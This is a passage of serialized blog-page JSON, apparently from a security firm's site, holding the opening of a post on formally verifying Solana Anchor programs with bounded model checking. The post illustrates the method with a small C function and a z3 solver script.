",{"type":28,"tag":98,"props":18373,"children":18375},{"className":18374},[],[18376],{"type":33,"value":14602},{"type":33,"value":18378}," struct) - this is exactly the lifetime we started with. ",{"type":28,"tag":87,"props":18380,"children":18384},{"href":18381,"ariaLabel":18382,"className":18383,"dataFootnoteBackref":7},"#user-content-fnref-slice-unbound-lifetime","Back to reference 6",[18201],[18385],{"type":33,"value":18204},{"type":28,"tag":2516,"props":18387,"children":18388},{},[18389],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":18391},[18392,18398,18402,18403,18405],{"id":14034,"depth":256,"text":18393,"children":18394},"Breaking down realloc",[18395,18396],{"id":14200,"depth":293,"text":14203},{"id":15553,"depth":293,"text":18397},"Back to realloc",{"id":16505,"depth":256,"text":16508,"children":18399},[18400,18401],{"id":16511,"depth":293,"text":16514},{"id":16732,"depth":293,"text":16735},{"id":16919,"depth":256,"text":16922},{"id":17321,"depth":256,"text":18404},"Towards safer unsafe",{"id":15143,"depth":256,"text":18096},"content:blog:2022-12-09-rust-realloc-and-references.md","blog/2022-12-09-rust-realloc-and-references.md","blog/2022-12-09-rust-realloc-and-references",{"_path":18410,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":18411,"description":18412,"author":18413,"image":18414,"date":18416,"isFeatured":19,"onBlogPage":19,"tags":18417,"body":18418,"_type":2534,"_id":28654,"_source":2536,"_file":28655,"_stem":28656,"_extension":2539},"/blog/2023-01-26-formally-verifying-solana-programs","Solana Formal Verification: A Case Study","We present a novel framework for formal verification of Solana Anchor programs — and a case study application to the Squads multisig.","harrison",{"src":18415,"height":13289,"width":18},"/posts/formally-verifying-solana-programs/formal-verification-title.jpg","2023-01-26",[2551,2552],{"type":25,"children":18419,"toc":28626},[18420,18425,18430,18456,18460,18472,18495,18518,18530,18553,18556,18562,18611,18617,18623,18628,18639,18680,18685,18691,18696,18929,18949,18954,18959,19032,19037,19107,19121,19546,19566,19572,19591,19596,19601,19606,19612,19624,19659,19670,19681,19693,19698,19729,19753,19772,19778,19795,19801,19828,19833,19853,19865,20011,20039,20042,20054,20137,20156,20159,20198,20365,20370,20376,20388,20406,20419,20580,20592,20605,21079,21084,21131,21137,21155,21224,21461,21675,21680,21754,21802,21807,21813,21915,22019,22024,22087,22092,22098,22163,22168,22210,22236,22242,22311,22316,22366,22377,22383,22394,22415,22420,22425,22448,22454,22466,22486,23582,23601,23652,23657,23665,23677,23682,23690,23695,23711,23747,23752,23846,23851,23859,23864,23976,23981,23989,24002,24166,24171,24179,24184,24189,24257,24291,24297,24302,24313,24331,24709,24721,24733,24741,24752,24783,24788,24796,24801,25074,25093,25098,25124,25992,26004,26103,26115,26157,26162,26174,26182,26187,26199,26225,26385,26397,26405,26410,26686,26691,26703,26858,26878,27204,27238,27431,27464,27476,27598,27618,27623,27628,27633,27646,27654,27659,28134,28146,28151,28163,28168,28427,28453,28458,28464,28470,28482,28494,28513,28560,28565,28571,28576,28581,28586,28590,28595,28600,28603,28622],{"type":28,"tag":29,"props":18421,"children":18422},{},[18423],{"type":33,"value":18424},"Since the early days of computing, bugs have crept their way into programs and wreaked havoc on the intentions of the programmer. Logical fallacies, race conditions, or simple typos could manifest as crashes or lay undetected, silently breaking the functionality of the host program.",{"type":28,"tag":29,"props":18426,"children":18427},{},[18428],{"type":33,"value":18429},"When your program is connected to the internet, there is the new risk that bugs may introduce security holes into your system. Even simple buffer overflows can be exploited by skilled attackers to compromise the integrity of your program.",{"type":28,"tag":29,"props":18431,"children":18432},{},[18433,18435,18439,18441,18446,18448,18455],{"type":33,"value":18434},"In the world of Web3 we create programs that talk to strangers ",{"type":28,"tag":2583,"props":18436,"children":18437},{},[18438],{"type":33,"value":16033},{"type":33,"value":18440}," control millions of dollars 🤑. Bugs in these programs are some of the ",{"type":28,"tag":2583,"props":18442,"children":18443},{},[18444],{"type":33,"value":18445},"juciest",{"type":33,"value":18447},"; anonymous attackers that can find and exploit them will walk away with potentially ",{"type":28,"tag":87,"props":18449,"children":18452},{"href":18450,"rel":18451},"https://rekt.news/leaderboard/",[91],[18453],{"type":33,"value":18454},"hundreds of millions of dollars",{"type":33,"value":141},{"type":28,"tag":18457,"props":18458,"children":18459},"hr",{},[],{"type":28,"tag":29,"props":18461,"children":18462},{},[18463,18465,18470],{"type":33,"value":18464},"At OtterSec we are ",{"type":28,"tag":2583,"props":18466,"children":18467},{},[18468],{"type":33,"value":18469},"highly skilled in pest control",{"type":33,"value":18471}," - finding and squashing bugs before they are exploited by less well-intentioned hackers. We are constantly striving to improve our techniques and develop new technologies that aid in our auditing processes.",{"type":28,"tag":29,"props":18473,"children":18474},{},[18475,18477,18484,18486,18493],{"type":33,"value":18476},"Recently we were contacted by the ",{"type":28,"tag":87,"props":18478,"children":18481},{"href":18479,"rel":18480},"https://squads.so/",[91],[18482],{"type":33,"value":18483},"Squads team",{"type":33,"value":18485}," to explore how formal verification could be used to verify security-critical properties of Solana programs. We were really excited about this opportunity and have been developing a prototype with the ",{"type":28,"tag":87,"props":18487,"children":18490},{"href":18488,"rel":18489},"https://github.com/Squads-Protocol/squads-mpl",[91],[18491],{"type":33,"value":18492},"Squads Multisig Program",{"type":33,"value":18494}," as our main case study.",{"type":28,"tag":29,"props":18496,"children":18497},{},[18498,18500,18507,18509,18516],{"type":33,"value":18499},"We now have a (mostly) working prototype that can be used to formally verify critical properties of Solana programs in order to ensure a higher level of security. Our tool integrates with ",{"type":28,"tag":87,"props":18501,"children":18504},{"href":18502,"rel":18503},"https://www.anchor-lang.com/",[91],[18505],{"type":33,"value":18506},"anchor-lang",{"type":33,"value":18508}," and provides new APIs to specify invariants for your Solana code. It then autogenerates proof harnesses which are verified with the ",{"type":28,"tag":87,"props":18510,"children":18513},{"href":18511,"rel":18512},"https://github.com/model-checking/kani",[91],[18514],{"type":33,"value":18515},"Kani Rust Verifier",{"type":33,"value":18517},". Additionally, we are implementing a formal-verification-friendly runtime SDK layer that accelerates the expensive process of running formal verification tools on complex code.",{"type":28,"tag":29,"props":18519,"children":18520},{},[18521,18523,18528],{"type":33,"value":18522},"In this blog post, we're excited to share our progress and the challenges we've encountered during the process. We will describe the main concepts behind ",{"type":28,"tag":2583,"props":18524,"children":18525},{},[18526],{"type":33,"value":18527},"bounded model checking",{"type":33,"value":18529}," (our formal verification method of choice) and explain how we've applied these concepts to Solana.",{"type":28,"tag":29,"props":18531,"children":18532},{},[18533],{"type":28,"tag":2583,"props":18534,"children":18535},{},[18536,18538,18545,18547],{"type":33,"value":18537},"If you're interested in learning more or getting your own programs formally verified, let us know! We'd be excited to chat with you! — Fill out ",{"type":28,"tag":87,"props":18539,"children":18542},{"href":18540,"rel":18541},"https://osec.io/contact",[91],[18543],{"type":33,"value":18544},"this form",{"type":33,"value":18546}," or email us at ",{"type":28,"tag":87,"props":18548,"children":18550},{"href":18549},"mailto:contact@osec.io",[18551],{"type":33,"value":18552},"contact@osec.io",{"type":28,"tag":18457,"props":18554,"children":18555},{},[],{"type":28,"tag":443,"props":18557,"children":18559},{"id":18558},"contents",[18560],{"type":33,"value":18561},"Contents:",{"type":28,"tag":455,"props":18563,"children":18564},{},[18565,18570,18587,18597,18602,18607],{"type":28,"tag":459,"props":18566,"children":18567},{},[18568],{"type":33,"value":18569},"Formal Verification with Bounded Model Checking\na. Overview\nb. A simple example\nc. Loop bounds & path explosion\nd. The Kani Rust Verifier",{"type":28,"tag":459,"props":18571,"children":18572},{},[18573,18578,18580,18585],{"type":28,"tag":4995,"props":18574,"children":18575},{},[18576],{"type":33,"value":18577},"Specification",{"type":33,"value":18579},": How can we describe what we ",{"type":28,"tag":2583,"props":18581,"children":18582},{},[18583],{"type":33,"value":18584},"want",{"type":33,"value":18586}," our program to do?",{"type":28,"tag":459,"props":18588,"children":18589},{},[18590,18595],{"type":28,"tag":4995,"props":18591,"children":18592},{},[18593],{"type":33,"value":18594},"Verification",{"type":33,"value":18596},": How do we check that our model is correct?",{"type":28,"tag":459,"props":18598,"children":18599},{},[18600],{"type":33,"value":18601},"Case Study: Squads Multisig",{"type":28,"tag":459,"props":18603,"children":18604},{},[18605],{"type":33,"value":18606},"Additional challenges in Solana",{"type":28,"tag":459,"props":18608,"children":18609},{},[18610],{"type":33,"value":2509},{"type":28,"tag":63,"props":18612,"children":18614},{"id":18613},"formal-verification-with-bounded-model-checking",[18615],{"type":33,"value":18616},"Formal Verification with Bounded Model Checking",{"type":28,"tag":75,"props":18618,"children":18620},{"id":18619},"overview",[18621],{"type":33,"value":18622},"Overview",{"type":28,"tag":29,"props":18624,"children":18625},{},[18626],{"type":33,"value":18627},"Formal verification is the process of using a formal specification to verify the correctness of a system. In this case, the systems we are verifying are programs written in Rust that run on the Solana blockchain.",{"type":28,"tag":29,"props":18629,"children":18630},{},[18631,18633,18638],{"type":33,"value":18632},"There are many different flavors of formal verification, however in this research we are using ",{"type":28,"tag":4995,"props":18634,"children":18635},{},[18636],{"type":33,"value":18637},"bounded model checking (BMC)",{"type":33,"value":141},{"type":28,"tag":29,"props":18640,"children":18641},{},[18642,18644,18649,18651,18656,18658,18662,18664,18670,18672,18678],{"type":33,"value":18643},"In short, the idea of BMC is to execute our program ",{"type":28,"tag":2583,"props":18645,"children":18646},{},[18647],{"type":33,"value":18648},"symbolically",{"type":33,"value":18650}," rather than ",{"type":28,"tag":2583,"props":18652,"children":18653},{},[18654],{"type":33,"value":18655},"concretely",{"type":33,"value":18657},". Instead of actually performing an ",{"type":28,"tag":2583,"props":18659,"children":18660},{},[18661],{"type":33,"value":9306},{"type":33,"value":18663}," when we see the line ",{"type":28,"tag":98,"props":18665,"children":18667},{"className":18666},[],[18668],{"type":33,"value":18669},"int x = a + b",{"type":33,"value":18671},", we store the symbolic expression ",{"type":28,"tag":98,"props":18673,"children":18675},{"className":18674},[],[18676],{"type":33,"value":18677},"x == a + b",{"type":33,"value":18679},". We do this for every line and once we reach the end of the program we have compiled a huge list of symbolic expressions. At this point, we can feed these expressions to a SMT solver along with a correctness property P in order to check if our program satisfies this property.",{"type":28,"tag":29,"props":18681,"children":18682},{},[18683],{"type":33,"value":18684},"If we hit a branch as we are tracing the program, we will take both sides of the branch adding the positive branch condition as a constraint to one side and the negative condition to the other side.",{"type":28,"tag":75,"props":18686,"children":18688},{"id":18687},"a-simple-example",[18689],{"type":33,"value":18690},"A simple example",{"type":28,"tag":29,"props":18692,"children":18693},{},[18694],{"type":33,"value":18695},"As an example, consider the following function:",{"type":28,"tag":234,"props":18697,"children":18699},{"code":18698,"language":1797,"meta":7,"className":16176,"style":7},"int foo(int x) {\n    int y = x + 3;\n    int z;\n    if (y > 100) {\n        z = y * 2;\n    } else {\n        z = y + 1;\n    }\n\n    // Property P:\n    assert(z != 105);\n}\n",[18700],{"type":28,"tag":98,"props":18701,"children":18702},{"__ignoreMap":7},[18703,18733,18767,18779,18804,18832,18847,18874,18881,18888,18896,18922],{"type":28,"tag":116,"props":18704,"children":18705},{"class":245,"line":246},[18706,18711,18716,18720,18724,18729],{"type":28,"tag":116,"props":18707,"children":18708},{"style":376},[18709],{"type":33,"value":18710},"int",{"type":28,"tag":116,"props":18712,"children":18713},{"style":282},[18714],{"type":33,"value":18715}," foo",{"type":28,"tag":116,"props":18717,"children":18718},{"style":266},[18719],{"type":33,"value":313},{"type":28,"tag":116,"props":18721,"children":18722},{"style":376},[18723],{"type":33,"value":18710},{"type":28,"tag":116,"props":18725,"children":18726},{"style":272},[18727],{"type":33,"value":18728}," x",{"type":28,"tag":116,"props":18730,"children":18731},{"style":266},[18732],{"type":33,"value":844},{"type":28,"tag":116,"props":18734,"children":18735},{"class":245,"line":256},[18736,18741,18745,18749,18754,18758,18763],{"type":28,"tag":116,"props":18737,"children":18738},{"style":376},[18739],{"type":33,"value":18740},"    int",{"type":28,"tag":116,"props":18742,"children":18743},{"style":266},[18744],{"type":33,"value":4183},{"type":28,"tag":116,"props":18746,"children":18747},{"style":370},[18748],{"type":33,"value":373},{"type":28,"tag":116,"props":18750,"children":18751},{"style":266},[18752],{"type":33,"value":18753}," x ",{"type":28,"tag":116,"props":18755,"children":18756},{"style":370},[18757],{"type":33,"value":2268},{"type":28,"tag":116,"props":18759,"children":18760},{"style":350},[18761],{"type":33,"value":18762}," 3",{"type":28,"tag":116,"props":18764,"children":18765},{"style":266},[18766],{"type":33,"value":384},{"type":28,"tag":116,"props":18768,"children":18769},{"class":245,"line":293},[18770,18774],{"type":28,"tag":116,"props":18771,"children":18772},{"style":376},[18773],{"type":33,"value":18740},{"type":28,"tag":116,"props":18775,"children":18776},{"style":266},[18777],{"type":33,"value":18778}," z;\n",{"type":28,"tag":116,"props":18780,"children":18781},{"class":245,"line":361},[18782,18786,18791,18795,18800],{"type":28,"tag":116,"props":18783,"children":18784},{"style":260},[18785],{"type":33,"value":11947},{"type":28,"tag":116,"props":18787,"children":18788},{"style":266},[18789],{"type":33,"value":18790}," (y ",{"type":28,"tag":116,"props":18792,"children":18793},{"style":370},[18794],{"type":33,"value":645},{"type":28,"tag":116,"props":18796,"children":18797},{"style":350},[18798],{"type":33,"value":18799}," 100",{"type":28,"tag":116,"props":18801,"children":18802},{"style":266},[18803],{"type":33,"value":844},{"type":28,"tag":116,"props":18805,"children":18806},{"class":245,"line":387},[18807,18812,18816,18820,18824,18828],{"type":28,"tag":116,"props":18808,"children":18809},{"style":266},[18810],{"type":33,"value":18811},"        z ",{"type":28,"tag":116,"props":18813,"children":18814},{"style":370},[18815],{"type":33,"value":373},{"type":28,"tag":116,"props":18817,"children":18818},{"style":266},[18819],{"type":33,"value":4183},{"type":28,"tag":116,"props":18821,"children":18822},{"style":370},[18823],{"type":33,"value":4240},{"type":28,"tag":116,"props":18825,"children":18826},{"style":350},[18827],{"type":33,"value":7606},{"type":28,"tag":116,"props":18829,"children":18830},{"style":266},[18831],{"type":33,"value":384},{"type":28,"tag":116,"props":18833,"children":18834},{"class":245,"line":400},[18835,18839,18843],{"type":28,"tag":116,"props":18836,"children":18837},{"style":266},[18838],{"type":33,"value":15440},{"type":28,"tag":116,"props":18840,"children":18841},{"style":260},[18842],{"type":33,"value":2986},{"type":28,"tag":116,"props":18844,"children":18845},{"style":266},[18846],{"type":33,"value":1291},{"type":28,"tag":116,"props":18848,"children":18849},{"class":245,"line":614},[18850,18854,18858,18862,18866,18870],{"type":28,"tag":116,"props":18851,"children":18852},{"style":266},[18853],{"type":33,"value":18811},{"type":28,"tag":116,"props":18855,"children":18856},{"style":370},[18857],{"type":33,"value":373},{"type":28,"tag":116,"props":18859,"children":18860},{"style":266},[18861],{"type":33,"value":4183},{"type":28,"tag":116,"props":18863,"children":18864},{"style":370},[18865],{"type":33,"value":2268},{"type":28,"tag":116,"props":18867,"children":18868},{"style":350},[18869],{"type":33,"value":4192},{"type":28,"tag":116,"props":18871,"children":18872},{"style":266},[18873],{"type":33,"value":384},{"type":28,"tag":116,"props":18875,"children":18876},{"class":245,"line":631},[18877],{"type":28,"tag":116,"props":18878,"children":18879},{"style":266},[18880],{"type":33,"value":3025},{"type":28,"tag":116,"props":18882,"children":18883},{"class":245,"line":665},[18884],{"type":28,"tag":116,"props":18885,"children":18886},{"emptyLinePlaceholder":19},[18887],{"type":33,"value":1044},{"type":28,"tag":116,"props":18889,"children":18890},{"class":245,"line":713},[18891],{"type":28,"tag":116,"props":18892,"children":18893},{"style":250},[18894],{"type":33,"value":18895},"    // Property P:\n",{"type":28,"tag":116,"props":18897,"children":18898},{"class":245,"line":750},[18899,18904,18909,18913,18918],{"type":28,"tag":116,"props":18900,"children":18901},{"style":282},[18902],{"type":33,"value":18903},"    assert",{"type":28,"tag":116,"props":18905,"children":18906},{"style":266},[18907],{"type":33,"value":18908},"(z ",{"type":28,"tag":116,"props":18910,"children":18911},{"style":370},[18912],{"type":33,"value":15350},{"type":28,"tag":116,"props":18914,"children":18915},{"style":350},[18916],{"type":33,"value":18917}," 105",{"type":28,"tag":116,"props":18919,"children":18920},{"style":266},[18921],{"type":33,"value":895},{"type":28,"tag":116,"props":18923,"children":18924},{"class":245,"line":779},[18925],{"type":28,"tag":116,"props":18926,"children":18927},{"style":266},[18928],{"type":33,"value":406},{"type":28,"tag":29,"props":18930,"children":18931},{},[18932,18934,18940,18942,18948],{"type":33,"value":18933},"This function takes an input ",{"type":28,"tag":98,"props":18935,"children":18937},{"className":18936},[],[18938],{"type":33,"value":18939},"x",{"type":33,"value":18941}," and does some computation. At the end of the program, the property we want to verify is that ",{"type":28,"tag":98,"props":18943,"children":18945},{"className":18944},[],[18946],{"type":33,"value":18947},"z != 105",{"type":33,"value":141},{"type":28,"tag":29,"props":18950,"children":18951},{},[18952],{"type":33,"value":18953},"With BMC, we could trace this program and derive the following constraints:",{"type":28,"tag":29,"props":18955,"children":18956},{},[18957],{"type":33,"value":18958},"Positive branch:",{"type":28,"tag":234,"props":18960,"children":18962},{"code":18961,"language":1797,"meta":7,"className":16176,"style":7},"y == x + 3\ny > 100\nz == y * 2\n",[18963],{"type":28,"tag":98,"props":18964,"children":18965},{"__ignoreMap":7},[18966,18991,19007],{"type":28,"tag":116,"props":18967,"children":18968},{"class":245,"line":246},[18969,18974,18978,18982,18986],{"type":28,"tag":116,"props":18970,"children":18971},{"style":266},[18972],{"type":33,"value":18973},"y ",{"type":28,"tag":116,"props":18975,"children":18976},{"style":370},[18977],{"type":33,"value":2340},{"type":28,"tag":116,"props":18979,"children":18980},{"style":266},[18981],{"type":33,"value":18753},{"type":28,"tag":116,"props":18983,"children":18984},{"style":370},[18985],{"type":33,"value":2268},{"type":28,"tag":116,"props":18987,"children":18988},{"style":350},[18989],{"type":33,"value":18990}," 3\n",{"type":28,"tag":116,"props":18992,"children":18993},{"class":245,"line":256},[18994,18998,19002],{"type":28,"tag":116,"props":18995,"children":18996},{"style":266},[18997],{"type":33,"value":18973},{"type":28,"tag":116,"props":18999,"children":19000},{"style":370},[19001],{"type":33,"value":645},{"type":28,"tag":116,"props":19003,"children":19004},{"style":350},[19005],{"type":33,"value":19006}," 100\n",{"type":28,"tag":116,"props":19008,"children":19009},{"class":245,"line":293},[19010,19015,19019,19023,19027],{"type":28,"tag":116,"props":19011,"children":19012},{"style":266},[19013],{"type":33,"value":19014},"z ",{"type":28,"tag":116,"props":19016,"children":19017},{"style":370},[19018],{"type":33,"value":2340},{"type":28,"tag":116,"props":19020,"children":19021},{"style":266},[19022],{"type":33,"value":4183},{"type":28,"tag":116,"props":19024,"children":19025},{"style":370},[19026],{"type":33,"value":4240},{"type":28,"tag":116,"props":19028,"children":19029},{"style":350},[19030],{"type":33,"value":19031}," 2\n",{"type":28,"tag":29,"props":19033,"children":19034},{},[19035],{"type":33,"value":19036},"Negative branch:",{"type":28,"tag":234,"props":19038,"children":19040},{"code":19039,"language":1797,"meta":7,"className":16176,"style":7},"y == x + 3\ny \u003C= 100\nz == y + 1\n",[19041],{"type":28,"tag":98,"props":19042,"children":19043},{"__ignoreMap":7},[19044,19067,19083],{"type":28,"tag":116,"props":19045,"children":19046},{"class":245,"line":246},[19047,19051,19055,19059,19063],{"type":28,"tag":116,"props":19048,"children":19049},{"style":266},[19050],{"type":33,"value":18973},{"type":28,"tag":116,"props":19052,"children":19053},{"style":370},[19054],{"type":33,"value":2340},{"type":28,"tag":116,"props":19056,"children":19057},{"style":266},[19058],{"type":33,"value":18753},{"type":28,"tag":116,"props":19060,"children":19061},{"style":370},[19062],{"type":33,"value":2268},{"type":28,"tag":116,"props":19064,"children":19065},{"style":350},[19066],{"type":33,"value":18990},{"type":28,"tag":116,"props":19068,"children":19069},{"class":245,"line":256},[19070,19074,19079],{"type":28,"tag":116,"props":19071,"children":19072},{"style":266},[19073],{"type":33,"value":18973},{"type":28,"tag":116,"props":19075,"children":19076},{"style":370},[19077],{"type":33,"value":19078},"\u003C=",{"type":28,"tag":116,"props":19080,"children":19081},{"style":350},[19082],{"type":33,"value":19006},{"type":28,"tag":116,"props":19084,"children":19085},{"class":245,"line":293},[19086,19090,19094,19098,19102],{"type":28,"tag":116,"props":19087,"children":19088},{"style":266},[19089],{"type":33,"value":19014},{"type":28,"tag":116,"props":19091,"children":19092},{"style":370},[19093],{"type":33,"value":2340},{"type":28,"tag":116,"props":19095,"children":19096},{"style":266},[19097],{"type":33,"value":4183},{"type":28,"tag":116,"props":19099,"children":19100},{"style":370},[19101],{"type":33,"value":2268},{"type":28,"tag":116,"props":19103,"children":19104},{"style":350},[19105],{"type":33,"value":19106}," 1\n",{"type":28,"tag":29,"props":19108,"children":19109},{},[19110,19112,19119],{"type":33,"value":19111},"Using the ",{"type":28,"tag":87,"props":19113,"children":19116},{"href":19114,"rel":19115},"https://github.com/Z3Prover/z3",[91],[19117],{"type":33,"value":19118},"z3",{"type":33,"value":19120}," SMT solver, we could check both of these cases like so:",{"type":28,"tag":234,"props":19122,"children":19126},{"code":19123,"language":19124,"meta":7,"className":19125,"style":7},"from z3 import *\n\nx = Int('x')\ny = Int('y')\nz = Int('z')\n\n# Positive branch:\ns = Solver()\ns.add(y == x + 3)\ns.add(y > 100)\ns.add(z == y * 2)\n\n# check if we can violate the correctness property\ns.add(Not(z != 105))\nprint(s.check()) # \"unsat\"\n\n# Negative branch:\ns = Solver()\ns.add(y == x + 3)\ns.add(y \u003C= 100)\ns.add(z == y + 1)\n\n# check if we can violate the correctness property\ns.add(Not(z != 105))\nprint(s.check()) # \"unsat\"\n","python","language-python shiki shiki-themes slack-dark",[19127],{"type":28,"tag":98,"props":19128,"children":19129},{"__ignoreMap":7},[19130,19153,19160,19186,19210,19234,19241,19249,19266,19294,19313,19341,19348,19356,19377,19395,19402,19410,19425,19452,19471,19498,19505,19512,19531],{"type":28,"tag":116,"props":19131,"children":19132},{"class":245,"line":246},[19133,19138,19143,19148],{"type":28,"tag":116,"props":19134,"children":19135},{"style":260},[19136],{"type":33,"value":19137},"from",{"type":28,"tag":116,"props":19139,"children":19140},{"style":266},[19141],{"type":33,"value":19142}," z3 ",{"type":28,"tag":116,"props":19144,"children":19145},{"style":260},[19146],{"type":33,"value":19147},"import",{"type":28,"tag":116,"props":19149,"children":19150},{"style":370},[19151],{"type":33,"value":19152}," *\n",{"type":28,"tag":116,"props":19154,"children":19155},{"class":245,"line":256},[19156],{"type":28,"tag":116,"props":19157,"children":19158},{"emptyLinePlaceholder":19},[19159],{"type":33,"value":1044},{"type":28,"tag":116,"props":19161,"children":19162},{"class":245,"line":293},[19163,19168,19172,19177,19182],{"type":28,"tag":116,"props":19164,"children":19165},{"style":266},[19166],{"type":33,"value":19167},"x ",{"type":28,"tag":116,"props":19169,"children":19170},{"style":370},[19171],{"type":33,"value":373},{"type":28,"tag":116,"props":19173,"children":19174},{"style":266},[19175],{"type":33,"value":19176}," Int(",{"type":28,"tag":116,"props":19178,"children":19179},{"style":563},[19180],{"type":33,"value":19181},"'x'",{"type":28,"tag":116,"props":19183,"children":19184},{"style":266},[19185],{"type":33,"value":2830},{"type":28,"tag":116,"props":19187,"children":19188},{"class":245,"line":361},[19189,19193,19197,19201,19206],{"type":28,"tag":116,"props":19190,"children":19191},{"style":266},[19192],{"type":33,"value":18973},{"type":28,"tag":116,"props":19194,"children":19195},{"style":370},[19196],{"type":33,"value":373},{"type":28,"tag":116,"props":19198,"children":19199},{"style":266},[19200],{"type":33,"value":19176},{"type":28,"tag":116,"props":19202,"children":19203},{"style":563},[19204],{"type":33,"value":19205},"'y'",{"type":28,"tag":116,"props":19207,"children":19208},{"style":266},[19209],{"type":33,"value":2830},{"type":28,"tag":116,"props":19211,"children":19212},{"class":245,"line":387},[19213,19217,19221,19225,19230],{"type":28,"tag":116,"props":19214,"children":19215},{"style":266},[19216],{"type":33,"value":19014},{"type":28,"tag":116,"props":19218,"children":19219},{"style":370},[19220],{"type":33,"value":373},{"type":28,"tag":116,"props":19222,"children":19223},{"style":266},[19224],{"type":33,"value":19176},{"type":28,"tag":116,"props":19226,"children":19227},{"style":563},[19228],{"type":33,"value":19229},"'z'",{"type":28,"tag":116,"props":19231,"children":19232},{"style":266},[19233],{"type":33,"value":2830},{"type":28,"tag":116,"props":19235,"children":19236},{"class":245,"line":400},[19237],{"type":28,"tag":116,"props":19238,"children":19239},{"emptyLinePlaceholder":19},[19240],{"type":33,"value":1044},{"type":28,"tag":116,"props":19242,"children":19243},{"class":245,"line":614},[19244],{"type":28,"tag":116,"props":19245,"children":19246},{"style":250},[19247],{"type":33,"value":19248},"# Positive branch:\n",{"type":28,"tag":116,"props":19250,"children":19251},{"class":245,"line":631},[19252,19257,19261],{"type":28,"tag":116,"props":19253,"children":19254},{"style":266},[19255],{"type":33,"value":19256},"s ",{"type":28,"tag":116,"props":19258,"children":19259},{"style":370},[19260],{"type":33,"value":373},{"type":28,"tag":116,"props":19262,"children":19263},{"style":266},[19264],{"type":33,"value":19265}," Solver()\n",{"type":28,"tag":116,"props":19267,"children":19268},{"class":245,"line":665},[19269,19274,19278,19282,19286,19290],{"type":28,"tag":116,"props":19270,"children":19271},{"style":266},[19272],{"type":33,"value":19273},"s.add(y ",{"type":28,"tag":116,"props":19275,"children":19276},{"style":370},[19277],{"type":33,"value":2340},{"type":28,"tag":116,"props":19279,"children":19280},{"style":266},[19281],{"type":33,"value":18753},{"type":28,"tag":116,"props":19283,"children":19284},{"style":370},[19285],{"type":33,"value":2268},{"type":28,"tag":116,"props":19287,"children":19288},{"style":350},[19289],{"type":33,"value":18762},{"type":28,"tag":116,"props":19291,"children":19292},{"style":266},[19293],{"type":33,"value":2830},{"type":28,"tag":116,"props":19295,"children":19296},{"class":245,"line":713},[19297,19301,19305,19309],{"type":28,"tag":116,"props":19298,"children":19299},{"style":266},[19300],{"type":33,"value":19273},{"type":28,"tag":116,"props":19302,"children":19303},{"style":370},[19304],{"type":33,"value":645},{"type":28,"tag":116,"props":19306,"children":19307},{"style":350},[19308],{"type":33,"value":18799},{"type":28,"tag":116,"props":19310,"children":19311},{"style":266},[19312],{"type":33,"value":2830},{"type":28,"tag":116,"props":19314,"children":19315},{"class":245,"line":750},[19316,19321,19325,19329,19333,19337],{"type":28,"tag":116,"props":19317,"children":19318},{"style":266},[19319],{"type":33,"value":19320},"s.add(z ",{"type":28,"tag":116,"props":19322,"children":19323},{"style":370},[19324],{"type":33,"value":2340},{"type":28,"tag":116,"props":19326,"children":19327},{"style":266},[19328],{"type":33,"value":4183},{"type":28,"tag":116,"props":19330,"children":19331},{"style":370},[19332],{"type":33,"value":4240},{"type":28,"tag":116,"props":19334,"children":19335},{"style":350},[19336],{"type":33,"value":7606},{"type":28,"tag":116,"props":19338,"children":19339},{"style":266},[19340],{"type":33,"value":2830},{"type":28,"tag":116,"props":19342,"children":19343},{"class":245,"line":779},[19344],{"type":28,"tag":116,"props":19345,"children":19346},{"emptyLinePlaceholder":19},[19347],{"type":33,"value":1044},{"type":28,"tag":116,"props":19349,"children":19350},{"class":245,"line":796},[19351],{"type":28,"tag":116,"props":19352,"children":19353},{"style":250},[19354],{"type":33,"value":19355},"# check if we can violate the correctness property\n",{"type":28,"tag":116,"props":19357,"children":19358},{"class":245,"line":847},[19359,19364,19368,19372],{"type":28,"tag":116,"props":19360,"children":19361},{"style":266},[19362],{"type":33,"value":19363},"s.add(Not(z ",{"type":28,"tag":116,"props":19365,"children":19366},{"style":370},[19367],{"type":33,"value":15350},{"type":28,"tag":116,"props":19369,"children":19370},{"style":350},[19371],{"type":33,"value":18917},{"type":28,"tag":116,"props":19373,"children":19374},{"style":266},[19375],{"type":33,"value":19376},"))\n",{"type":28,"tag":116,"props":19378,"children":19379},{"class":245,"line":898},[19380,19385,19390],{"type":28,"tag":116,"props":19381,"children":19382},{"style":282},[19383],{"type":33,"value":19384},"print",{"type":28,"tag":116,"props":19386,"children":19387},{"style":266},[19388],{"type":33,"value":19389},"(s.check()) ",{"type":28,"tag":116,"props":19391,"children":19392},{"style":250},[19393],{"type":33,"value":19394},"# \"unsat\"\n",{"type":28,"tag":116,"props":19396,"children":19397},{"class":245,"line":907},[19398],{"type":28,"tag":116,"props":19399,"children":19400},{"emptyLinePlaceholder":19},[19401],{"type":33,"value":1044},{"type":28,"tag":116,"props":19403,"children":19404},{"class":245,"line":981},[19405],{"type":28,"tag":116,"props":19406,"children":19407},{"style":250},[19408],{"type":33,"value":19409},"# Negative branch:\n",{"type":28,"tag":116,"props":19411,"children":19412},{"class":245,"line":1011},[19413,19417,19421],{"type":28,"tag":116,"props":19414,"children":19415},{"style":266},[19416],{"type":33,"value":19256},{"type":28,"tag":116,"props":19418,"children":19419},{"style":370},[19420],{"type":33,"value":373},{"type":28,"tag":116,"props":19422,"children":19423},{"style":266},[19424],{"type":33,"value":19265},{"type":28,"tag":116,"props":19426,"children":19427},{"class":245,"line":1029},[19428,19432,19436,19440,19444,19448],{"type":28,"tag":116,"props":19429,"children":19430},{"style":266},[19431],{"type":33,"value":19273},{"type":28,"tag":116,"props":19433,"children":19434},{"style":370},[19435],{"type":33,"value":2340},{"type":28,"tag":116,"props":19437,"children":19438},{"style":266},[19439],{"type":33,"value":18753},{"type":28,"tag":116,"props":19441,"children":19442},{"style":370},[19443],{"type":33,"value":2268},{"type":28,"tag":116,"props":19445,"children":19446},{"style":350},[19447],{"type":33,"value":18762},{"type":28,"tag":116,"props":19449,"children":19450},{"style":266},[19451],{"type":33,"value":2830},{"type":28,"tag":116,"props":19453,"children":19454},{"class":245,"line":1038},[19455,19459,19463,19467],{"type":28,"tag":116,"props":19456,"children":19457},{"style":266},[19458],{"type":33,"value":19273},{"type":28,"tag":116,"props":19460,"children":19461},{"style":370},[19462],{"type":33,"value":19078},{"type":28,"tag":116,"props":19464,"children":19465},{"style":350},[19466],{"type":33,"value":18799},{"type":28,"tag":116,"props":19468,"children":19469},{"style":266},[19470]